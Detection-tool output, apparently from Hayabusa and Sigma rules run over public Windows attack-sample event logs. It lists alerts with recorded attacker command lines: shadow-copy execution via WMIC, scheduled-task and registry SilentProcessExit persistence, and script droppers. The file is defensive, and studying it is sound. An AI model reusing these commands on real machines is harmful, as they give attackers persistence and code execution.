C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx -2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx -2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx -2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe : Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin : Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe : User: IEWIN7\IEUser : Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe : Path: C:\Windows\Temp\evil.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE"" -na : Path: C:\Windows\System32\NETSTAT.EXE : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: 